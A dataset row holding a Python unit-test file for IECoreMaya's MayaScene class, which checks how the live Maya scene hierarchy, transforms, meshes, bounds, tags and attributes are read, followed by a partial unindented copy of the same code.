code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import maya.cmds
import maya.OpenMaya as OpenMaya
import IECore
import IECoreMaya
class MayaSceneTest( IECoreMaya.TestCase ) :
    """Tests for IECoreMaya.MayaScene, the SceneInterface implementation that
    exposes the live Maya DAG as a hierarchical scene.

    NOTE(review): the original source had all indentation stripped (dataset
    extraction artifact); the structure below is reconstructed from the
    unambiguous Python syntax. Behaviour-bearing statements are unchanged.
    """

    def setUp( self ) :
        # Start every test from a fresh, empty Maya scene.
        maya.cmds.file( new=True, f=True )

    def testFileName( self ) :
        """The live scene is not backed by a file, so fileName() must raise."""
        scene = IECoreMaya.MayaScene()
        self.assertRaises( RuntimeError, scene.fileName )

    def testChildNames( self ) :
        """childNames() lists child transforms but not shape nodes."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        sphere2 = maya.cmds.polySphere( name="pSphere2" )
        sphere3 = maya.cmds.polySphere( name="pSphere3" )
        maya.cmds.parent( "pSphere2", "pSphere1" )
        maya.cmds.parent( "pSphere3", "pSphere1" )
        scene = IECoreMaya.MayaScene()
        child = scene.child( "pSphere1" )
        self.assertEqual( set( child.childNames() ), set( [ "pSphere2", "pSphere3" ] ) )
        self.assertEqual( scene.child( "pSphere1" ).child( "pSphere2" ).childNames(), [] )

    def testHasChild( self ) :
        """hasChild() is true for child transforms, false for shapes and unknowns."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        sphere2 = maya.cmds.polySphere( name="pSphere2" )
        sphere3 = maya.cmds.polySphere( name="pSphere3" )
        maya.cmds.parent( "pSphere2", "pSphere1" )
        maya.cmds.parent( "pSphere3", "pSphere1" )
        scene = IECoreMaya.MayaScene()
        child = scene.child( "pSphere1" )
        self.assertEqual( scene.hasChild("pSphere1"), True )
        self.assertEqual( child.hasChild("pSphere1Shape"), False )
        self.assertEqual( child.hasChild("pSphere2"), True )
        self.assertEqual( child.hasChild("pSphere3"), True )
        self.assertEqual( child.hasChild("pSphere3Shape"), False )
        self.assertEqual( child.hasChild("pSphere2Shape"), False )
        self.assertEqual( child.hasChild("asdfasdf"), False )

    def testNames( self ) :
        """name() returns "/" at the root and the node name below it."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        sphere2 = maya.cmds.polySphere( name="pSphere2" )
        sphere3 = maya.cmds.polySphere( name="pSphere3" )
        maya.cmds.parent( "pSphere2", "pSphere1" )
        maya.cmds.parent( "pSphere3", "pSphere1" )
        scene = IECoreMaya.MayaScene()
        sphere1 = scene.child( "pSphere1" )
        sphere2 = sphere1.child( "pSphere2" )
        sphere3 = sphere1.child( "pSphere3" )
        self.assertEqual( str( scene.name() ), "/" )
        self.assertEqual( str( sphere1.name() ), "pSphere1" )
        self.assertEqual( str( sphere2.name() ), "pSphere2" )
        self.assertEqual( str( sphere3.name() ), "pSphere3" )

    def testPaths( self ) :
        """path() returns the list of ancestor names from the root down."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        sphere2 = maya.cmds.polySphere( name="pSphere2" )
        sphere3 = maya.cmds.polySphere( name="pSphere3" )
        maya.cmds.parent( "pSphere2", "pSphere1" )
        maya.cmds.parent( "pSphere3", "pSphere1" )
        scene = IECoreMaya.MayaScene()
        sphere1 = scene.child( "pSphere1" )
        sphere2 = sphere1.child( "pSphere2" )
        sphere3 = sphere1.child( "pSphere3" )
        self.assertEqual( scene.path(), [] )
        self.assertEqual( sphere1.path(), [ "pSphere1" ] )
        self.assertEqual( sphere2.path(), [ "pSphere1", "pSphere2" ] )
        self.assertEqual( sphere3.path(), [ "pSphere1", "pSphere3" ] )

    def testSceneMethod( self ) :
        """scene() resolves absolute paths regardless of the current location."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        sphere2 = maya.cmds.polySphere( name="pSphere2" )
        sphere3 = maya.cmds.polySphere( name="pSphere3" )
        maya.cmds.parent( "pSphere2", "pSphere1" )
        maya.cmds.parent( "pSphere3", "pSphere1" )
        scene = IECoreMaya.MayaScene()
        self.assertEqual( str( scene.scene( ["pSphere1"] ).name() ), "pSphere1" )
        # does it still return absolute paths if we've gone to another location?
        scene = scene.scene( ["pSphere1"] )
        self.assertEqual( str( scene.scene( [] ).name() ), "/" )
        self.assertEqual( str( scene.scene( ["pSphere1", "pSphere2"] ).name() ), "pSphere2" )
        self.assertEqual( str( scene.scene( ["pSphere1", "pSphere3"] ).name() ), "pSphere3" )
        self.assertEqual( scene.scene( ["idontexist"], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
        self.assertRaises( RuntimeError, IECore.curry( scene.scene, ["idontexist"] ) )

    def testHasObject( self ) :
        """hasObject() is false at the root and true at a shape transform."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        scene = IECoreMaya.MayaScene()
        child = scene.child( "pSphere1" )
        self.assertEqual( scene.hasObject(), False )
        self.assertEqual( child.hasObject(), True )

    def testReadTransformMethods( self ) :
        """readTransform() returns the local transform, matching readTransformAsMatrix()."""
        # create a little hierarchy
        transfromythingy = maya.cmds.createNode( "transform", name="transform1" )
        maya.cmds.setAttr( "transform1.tx", 0.1 )
        maya.cmds.setAttr( "transform1.ty", 0.2 )
        maya.cmds.setAttr( "transform1.tz", 0.3 )
        maya.cmds.setAttr( "transform1.rx", 0.1 )
        maya.cmds.setAttr( "transform1.ry", 0.2 )
        maya.cmds.setAttr( "transform1.rz", 0.3 )
        maya.cmds.setAttr( "transform1.sx", 0.1 )
        maya.cmds.setAttr( "transform1.sy", 0.2 )
        maya.cmds.setAttr( "transform1.sz", 0.3 )
        sphere = maya.cmds.polySphere( name="pSphere1" )
        maya.cmds.parent( "pSphere1", "transform1" )
        maya.cmds.setAttr( "pSphere1.tx", 1 )
        maya.cmds.setAttr( "pSphere1.ty", 2 )
        maya.cmds.setAttr( "pSphere1.tz", 3 )
        maya.cmds.setAttr( "pSphere1.rx", 10 )
        maya.cmds.setAttr( "pSphere1.ry", 20 )
        maya.cmds.setAttr( "pSphere1.rz", 30 )
        maya.cmds.setAttr( "pSphere1.sx", 4 )
        maya.cmds.setAttr( "pSphere1.sy", 5 )
        maya.cmds.setAttr( "pSphere1.sz", 6 )
        scene = IECoreMaya.MayaScene()
        transformChild = scene.child( "transform1" ).child( "pSphere1" )
        # test it returns the correct transform in local space
        maya.cmds.currentTime( "0.0sec" )
        transform = transformChild.readTransform( 0 ).value
        import math
        self.assertAlmostEqual( transform.translate.x, 1, 5 )
        self.assertAlmostEqual( transform.translate.y, 2, 5 )
        self.assertAlmostEqual( transform.translate.z, 3, 5 )
        # rotation is stored in radians; compare in degrees
        self.assertAlmostEqual( transform.rotate.x * 180.0 / math.pi, 10.0, 5 )
        self.assertAlmostEqual( transform.rotate.y * 180.0 / math.pi, 20.0, 5 )
        self.assertAlmostEqual( transform.rotate.z * 180.0 / math.pi, 30.0, 5 )
        self.assertAlmostEqual( transform.scale.x, 4, 5 )
        self.assertAlmostEqual( transform.scale.y, 5, 5 )
        self.assertAlmostEqual( transform.scale.z, 6, 5 )
        self.assertEqual( transform.transform, transformChild.readTransformAsMatrix( 0 ) )

    def testTimeException( self ) :
        """Reading at a time other than the current frame must raise."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
        maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
        maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
        maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
        maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
        maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
        scene = IECoreMaya.MayaScene()
        transformChild = scene.child( "pSphere1" )
        # move to frame -1:
        maya.cmds.currentTime( -1 )
        # test it returns the correct transform in local space
        self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.5 ) )
        self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 1.0 ) )

    def testAnimatedTransform( self ) :
        """readTransform() follows keyframed animation at the current time."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
        maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
        maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
        maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
        maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
        maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
        scene = IECoreMaya.MayaScene()
        transformChild = scene.child( "pSphere1" )
        # test it returns the correct transform in local space
        maya.cmds.currentTime( "0sec" )
        transform0 = transformChild.readTransform( 0 ).value
        maya.cmds.currentTime( "0.5sec" )
        transform0_5 = transformChild.readTransform( 0.5 ).value
        maya.cmds.currentTime( "1sec" )
        transform1 = transformChild.readTransform( 1 ).value
        self.assertEqual( transform0.translate, IECore.V3d( 1, 2, 3 ) )
        self.assertAlmostEqual( transform0_5.translate.x, 2.5, 5 )
        self.assertAlmostEqual( transform0_5.translate.y, 3.5, 5 )
        self.assertAlmostEqual( transform0_5.translate.z, 4.5, 5 )
        self.assertEqual( transform1.translate, IECore.V3d( 4, 5, 6 ) )

    def testDeletedDagPath( self ) :
        """Methods on a scene whose DAG node was deleted must raise."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        scene = IECoreMaya.MayaScene()
        child = scene.child( "pSphere1" )
        maya.cmds.delete( "pSphere1" )
        self.assertRaises( RuntimeError, IECore.curry( child.child, "pSphereShape1" ) )
        self.assertRaises( RuntimeError, child.childNames )
        self.assertRaises( RuntimeError, IECore.curry( child.hasChild, "asdd" ) )
        self.assertRaises( RuntimeError, child.name )
        self.assertRaises( RuntimeError, child.path )
        self.assertRaises( RuntimeError, child.hasObject )
        self.assertRaises( RuntimeError, IECore.curry( child.readBound, 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( child.readObject, 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( child.readTransform, 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( child.readTransformAsMatrix, 0.0 ) )
        # this doesn't need to throw an exception does it?
        self.assertEqual( child.scene( [ "pSphere1", "pSphereShape1" ], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
        # I guess this does...
        self.assertRaises( RuntimeError, IECore.curry( child.scene, [ "pSphere1", "pSphereShape1" ] ) )

    def testReadMesh( self ) :
        """readObject() returns the mesh with object-space vertex positions."""
        # create a cube:
        maya.cmds.polyCube( name = "pCube1" )
        # transform a bit, so we can check it's returning the mesh in world space:
        maya.cmds.setAttr( "pCube1.tx", 0.1 )
        maya.cmds.setAttr( "pCube1.ty", 0.2 )
        maya.cmds.setAttr( "pCube1.tz", 0.3 )
        maya.cmds.setAttr( "pCube1.rx", 10 )
        maya.cmds.setAttr( "pCube1.ry", 20 )
        maya.cmds.setAttr( "pCube1.rz", 30 )
        scene = IECoreMaya.MayaScene()
        cube = scene.child( "pCube1" )
        # read mesh at time 0:
        maya.cmds.currentTime( "0.0sec" )
        mesh = cube.readObject( 0 )
        vertList = list( mesh["P"].data )
        # check it's got the right length:
        self.assertEqual( len( vertList ), 8 )
        # check it's got the right verts:
        self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, 0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, 0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, 0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, 0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, -0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, -0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, -0.5 ) ), 1 )
        self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, -0.5 ) ), 1 )
        # check read primvars
        self.assertEqual( mesh["P"], cube.readObjectPrimitiveVariables( [ "P" ], 0 )["P"] )

    def testAnimatedMesh( self ) :
        """readObject() reflects deforming (cluster-animated) geometry."""
        cube = maya.cmds.polyCube( name = "pCube1" )
        # create a skin cluster to animate vertex 0:
        maya.cmds.select( cl=True )
        maya.cmds.select( "pCube1.vtx[0]", r=True )
        cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
        maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
        maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
        scene = IECoreMaya.MayaScene()
        cube = scene.child( "pCube1" )
        # read mesh at different times:
        maya.cmds.currentTime( "0.0sec" )
        mesh0 = cube.readObject( 0 )
        maya.cmds.currentTime( "0.5sec" )
        mesh0_5 = cube.readObject( 0.5 )
        maya.cmds.currentTime( "1.0sec" )
        mesh1 = cube.readObject( 1 )
        # have we moved vertex 0?
        self.assertEqual( mesh0["P"].data[0].x, -0.5 )
        self.assertEqual( mesh0_5["P"].data[0].x, -1 )
        self.assertEqual( mesh1["P"].data[0].x, -1.5 )

    def testReadBound( self ) :
        """readBound() returns object-space bounds including children."""
        # create some cubes:
        maya.cmds.polyCube( name = "pCube1" )
        maya.cmds.polyCube( name = "pCube2" )
        maya.cmds.polyCube( name = "pCube3" )
        maya.cmds.polyCube( name = "pCube4" )
        maya.cmds.parent( "pCube2", "pCube1" )
        maya.cmds.parent( "pCube3", "pCube1" )
        maya.cmds.setAttr( "pCube4.tx", 3 )
        maya.cmds.setAttr( "pCube4.ty", 3 )
        maya.cmds.setAttr( "pCube4.tz", 3 )
        maya.cmds.setAttr( "pCube2.tx", 1 )
        maya.cmds.setAttr( "pCube2.ty", 1 )
        maya.cmds.setAttr( "pCube2.tz", 1 )
        maya.cmds.setAttr( "pCube3.tx", -1 )
        maya.cmds.setAttr( "pCube3.ty", -1 )
        maya.cmds.setAttr( "pCube3.tz", -1 )
        scene = IECoreMaya.MayaScene()
        cube4Transform = scene.child( "pCube4" )
        cube1Transform = scene.child( "pCube1" )
        maya.cmds.currentTime( "0.0sec" )
        self.assertEqual( scene.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 3.5, 3.5, 3.5 ) ) )
        self.assertEqual( cube4Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
        # check it's including its children:
        self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
        maya.cmds.setAttr( "pCube1.tx", 1 )
        maya.cmds.setAttr( "pCube1.ty", 1 )
        maya.cmds.setAttr( "pCube1.tz", 1 )
        # should be in object space!!!
        self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
        cube2Transform = cube1Transform.child( "pCube2" )
        self.assertEqual( cube2Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
        cube3Transform = cube1Transform.child( "pCube3" )
        self.assertEqual( cube3Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )

    def testAnimatedMeshBound( self ) :
        """Bounds of a deforming mesh tracked over time."""
        # Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
        # times, and that doesn't work, although it kind of should!
        maya.cmds.polyCube( name = "pCube2" )
        # create a skin cluster to animate vertex 0:
        maya.cmds.select( cl=True )
        maya.cmds.select( "pCube2.vtx[0]", r=True )
        cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
        maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
        maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
        scene = IECoreMaya.MayaScene()
        transformChild = scene.child( "pCube2" )
        maya.cmds.currentTime( "0.0sec" )
        self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
        maya.cmds.currentTime( "0.5sec" )
        self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
        maya.cmds.currentTime( "1.0sec" )
        self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )

    def testAnimatedBound( self ) :
        """Bounds of a parent transform track an animated child transform."""
        # Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
        # times, and that doesn't work, although it kind of should!
        maya.cmds.polyCube( name = "pCube1" )
        maya.cmds.createNode( "transform", name = "pCube1Parent" )
        maya.cmds.parent( "pCube1", "pCube1Parent" )
        maya.cmds.setKeyframe( "pCube1", attribute="tx", t="0sec", v=0 )
        maya.cmds.setKeyframe( "pCube1", attribute="tx", t="1sec", v=-1 )
        scene = IECoreMaya.MayaScene()
        transformChild = scene.child( "pCube1Parent" )
        maya.cmds.currentTime( "0.0sec" )
        self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
        maya.cmds.currentTime( "0.5sec" )
        self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.0, 0.5, 0.5 ) ) )
        maya.cmds.currentTime( "1.0sec" )
        self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( -0.5, 0.5, 0.5 ) ) )

    def testCameraTransform( self ) :
        # camera must be output with an identity transform, because of the hierarchical
        # nature of this class...
        scene = IECoreMaya.MayaScene()
        cameraTransform = scene.child( "persp" )
        maya.cmds.currentTime( "0.0sec" )
        camera = cameraTransform.readObject( 0 )
        # sanity check: camera transform is not identity?
        self.assertNotEqual( cameraTransform.readTransformAsMatrix( 0 ), IECore.M44f() )
        # this transform must be identity...
        self.assertEqual( camera.getTransform().transform(), IECore.M44f() )

    def testMeshChange( self ) :
        """readObject() reflects topology changes made after the scene was created."""
        sphere = maya.cmds.polySphere( name="pSphere1" )
        scene = IECoreMaya.MayaScene()
        sphere = scene.child( "pSphere1" )
        maya.cmds.currentTime( "0.0sec" )
        mesh = sphere.readObject( 0 )
        # should default to 382 verts:
        self.assertEqual( len( mesh["P"].data ), 382 )
        maya.cmds.setAttr( "polySphere1.subdivisionsAxis", 3 )
        maya.cmds.setAttr( "polySphere1.subdivisionsHeight", 3 )
        mesh = sphere.readObject( 0 )
        # should be 8 verts now:
        self.assertEqual( len( mesh["P"].data ), 8 )

    def testWriteExceptions( self ) :
        """MayaScene is read-only; all write methods must raise."""
        scene = IECoreMaya.MayaScene()
        self.assertRaises( RuntimeError, IECore.curry( scene.writeBound, IECore.Box3d(), 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( scene.writeTransform, IECore.M44dData( IECore.M44d() ), 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( scene.writeAttribute, "asdfs", IECore.BoolData( False ), 0.0 ) )
        self.assertRaises( RuntimeError, IECore.curry( scene.writeObject, IECore.SpherePrimitive(), 0.0 ) )

    def testSceneShapeCustomReaders( self ):
        """Scene shapes expose link attributes, expansion and time remapping."""
        # make sure we are at time 0
        maya.cmds.currentTime( "0sec" )
        scene = IECoreMaya.MayaScene()
        envShape = str( IECoreMaya.FnSceneShape.create( "ieScene1" ).fullPathName() )
        envNode = 'ieScene1'
        envScene = scene.child( envNode )
        self.assertFalse( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        maya.cmds.setAttr( envShape+'.file', 'test/IECore/data/sccFiles/environment.lscc',type='string' )
        self.assertTrue( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        spheresShape = str( IECoreMaya.FnSceneShape.create( "ieScene2" ).fullPathName() )
        spheresNode = 'ieScene2'
        maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
        self.assertEqual( set( scene.childNames() ).intersection([ envNode, spheresNode ]) , set( [ envNode, spheresNode ] ) )
        self.assertTrue( IECore.LinkedScene.linkAttribute in envScene.attributeNames() )
        self.assertEqual( envScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/environment.lscc'), "root":IECore.InternedStringVectorData() } ) )
        self.assertFalse( envScene.hasObject() )
        spheresScene = scene.child( spheresNode )
        self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData() } ) )
        self.assertFalse( spheresScene.hasObject() )
        # expand the scene
        fnSpheres = IECoreMaya.FnSceneShape( spheresShape )
        fnSpheres.expandAll()
        self.assertFalse( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        leafScene = spheresScene.child("A").child("a")
        self.assertTrue( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        # When expanding, we connect the child time attributes to their scene shape parent time attribute to propagate time remapping. When checking for time remapping, the scene shape
        # currently only checks the direct connection, so we have here time in the link attributes. Will have to look out for performance issues.
        self.assertEqual( leafScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData([ 'A', 'a' ]), 'time':IECore.DoubleData( 0 ) } ) )
        self.assertFalse( leafScene.hasObject() )
        # expand scene to meshes
        fnSpheres.convertAllToGeometry()
        self.assertFalse( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        self.assertTrue( leafScene.hasObject() )
        self.assertTrue( isinstance( leafScene.readObject(0), IECore.MeshPrimitive) )
        # test time remapped scene readers...
        spheresShape = str( maya.cmds.createNode( 'ieSceneShape' ) )
        maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
        maya.cmds.setAttr( spheresShape+'.time', 24.0*10 )
        spheresScene = scene.child( 'ieScene3' )
        self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
        self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData(), "time":IECore.DoubleData(10.0) } ) )

    def testReadRootAttribute( self ):
        maya.cmds.file( new=True, f=True )
        # make sure we are at time 0
        maya.cmds.currentTime( "0sec" )
        scene = IECoreMaya.MayaScene()
        # tests a bug where calling attributeNames at the root raised an exception
        scene.attributeNames()

    def testCustomTags( self ) :
        """Custom tag callbacks registered via registerCustomTags()."""
        t = maya.cmds.createNode( "transform" )
        maya.cmds.select( clear = True )
        sphere = maya.cmds.polySphere( name="pSphere" )
        doTest = True

        def hasMyTags( node, tag, tagFilter ) :
            """'archivable' should be on all transforms and 'renderable' only at shape transforms."""
            if not doTest:
                return False
            if tag not in ( "renderable", "archivable" ) :
                return False
            if tag == "archivable" :
                return True
            dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
            try:
                dagPath.extendToShapeDirectlyBelow(0)
            except:
                return False
            if not ( tagFilter & IECore.SceneInterface.TagFilter.LocalTag ) :
                return False
            if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
                return False
            return dagPath.fullPathName().endswith("Shape")

        def readMyTags( node, tagFilter ) :
            """'archivable' should be on all transforms and 'renderable' only at shape transforms."""
            if not doTest:
                return []
            result = [ "archivable" ]
            dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
            try:
                dagPath.extendToShapeDirectlyBelow(0)
            except:
                return result
            if tagFilter & IECore.SceneInterface.TagFilter.LocalTag and dagPath.apiType() == maya.OpenMaya.MFn.kMesh :
                result.append( "renderable" )
            return result

        IECoreMaya.MayaScene.registerCustomTags( hasMyTags, readMyTags )
        scene = IECoreMaya.MayaScene()
        transformScene = scene.child(str(t))
        sphereScene = scene.child('pSphere')
        self.assertFalse( scene.hasTag( 'renderable' ) )
        self.assertFalse( scene.hasTag( 'archivable' ) )
        self.assertEqual( scene.readTags(), [] )
        self.assertFalse( transformScene.hasTag( 'renderable' ) )
        self.assertTrue( transformScene.hasTag( 'archivable' ) )
        self.assertEqual( transformScene.readTags(), [ IECore.InternedString('archivable') ] )
        self.assertEqual( set(sphereScene.readTags()), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
        self.assertEqual( set(sphereScene.readTags( IECore.SceneInterface.TagFilter.EveryTag )), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
        self.assertEqual( sphereScene.readTags( IECore.SceneInterface.TagFilter.AncestorTag ), [ IECore.InternedString('archivable') ] )
        self.assertTrue( sphereScene.hasTag( 'renderable') )
        self.assertTrue( sphereScene.hasTag( 'archivable') )
        # Disable custom tag functions so they don't mess with other tests
        doTest = False

    def testCustomAttributes( self ) :
        """Custom attribute callbacks registered via registerCustomAttributes()."""
        t = maya.cmds.createNode( "transform" )
        maya.cmds.select( clear = True )
        sphere = maya.cmds.polySphere( name="pSphere" )
        maya.cmds.currentTime( "0sec" )
        doTest = True

        def myAttributeNames( node ) :
            if not doTest:
                return []
            dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
            try:
                dagPath.extendToShapeDirectlyBelow(0)
            except:
                return ["transformAttribute"]
            if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
                return []
            return ["shapeAttribute"]

        def readMyAttribute( node, attr ) :
            if not doTest:
                return None
            dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
            try:
                dagPath.extendToShapeDirectlyBelow(0)
            except:
                if attr == "shapeAttribute":
                    return None
                return IECore.FloatData( 5 )
            if attr == "transformAttribute":
                return None
            if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
                return None
            return IECore.StringData("mesh")

        IECoreMaya.MayaScene.registerCustomAttributes( myAttributeNames, readMyAttribute )
        scene = IECoreMaya.MayaScene()
        transformScene = scene.child(str(t))
        sphereScene = scene.child('pSphere')
        self.assertEqual( scene.attributeNames(), [] )
        self.assertEqual( scene.readAttribute("anyAttr", 0.0), None )
        self.assertEqual( transformScene.attributeNames(), [ IECore.InternedString("transformAttribute") ] )
        self.assertEqual( transformScene.hasAttribute("shapeAttribute"), False )
        self.assertEqual( transformScene.readAttribute("shapeAttribute", 0.0), None )
        self.assertEqual( transformScene.readAttribute( "transformAttribute", 0.0), IECore.FloatData(5) )
        self.assertEqual( sphereScene.attributeNames(), [ IECore.InternedString('shapeAttribute') ] )
        self.assertEqual( sphereScene.readAttribute( "shapeAttribute", 0.0), IECore.StringData("mesh") )
        # Disable custom attribute functions so they don't mess with other tests
        doTest = False
# Run the suite under Maya's test program, loading the ieCore plugin first.
# (The table-cell residue "| test/IECoreMaya/MayaSceneTest.py |" that had been
# fused onto this line by the dataset extraction has been removed.)
if __name__ == "__main__":
    IECoreMaya.TestProgram( plugins = [ "ieCore" ] )
import maya.cmds
import maya.OpenMaya as OpenMaya
import IECore
import IECoreMaya
class MayaSceneTest( IECoreMaya.TestCase ) :
def setUp( self ) :
maya.cmds.file( new=True, f=True )
def testFileName( self ) :
scene = IECoreMaya.MayaScene()
self.assertRaises( RuntimeError, scene.fileName )
def testChildNames( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( set( child.childNames() ), set( [ "pSphere2", "pSphere3" ] ) )
self.assertEqual( scene.child( "pSphere1" ).child( "pSphere2" ).childNames(), [] )
def testHasChild( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( scene.hasChild("pSphere1"), True )
self.assertEqual( child.hasChild("pSphere1Shape"), False )
self.assertEqual( child.hasChild("pSphere2"), True )
self.assertEqual( child.hasChild("pSphere3"), True )
self.assertEqual( child.hasChild("pSphere3Shape"), False )
self.assertEqual( child.hasChild("pSphere2Shape"), False )
self.assertEqual( child.hasChild("asdfasdf"), False )
def testNames( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
